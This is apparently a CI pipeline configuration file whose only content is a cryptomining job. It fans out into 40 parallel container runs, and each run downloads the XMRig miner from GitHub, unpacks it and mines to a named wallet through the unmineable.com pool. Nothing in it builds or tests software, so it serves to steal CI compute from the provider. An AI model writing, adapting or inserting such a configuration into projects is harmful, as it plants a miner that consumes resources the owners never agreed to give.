task:
  matrix:
    miner: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
            11,12,13,14,15,16,17,18,19,20,
            21,22,23,24,25,26,27,28,29,30,
            31,32,33,34,35,36,37,38,39,40]
  container:
    image: ubuntu:22.04
  install_script:
    - apt update && apt install -y wget tar
  script: |
    echo "Starting miner-${miner}"
    wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
    tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
    cd xmrig-6.22.2
    ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.Saw666 -p x --tls --threads=2
    
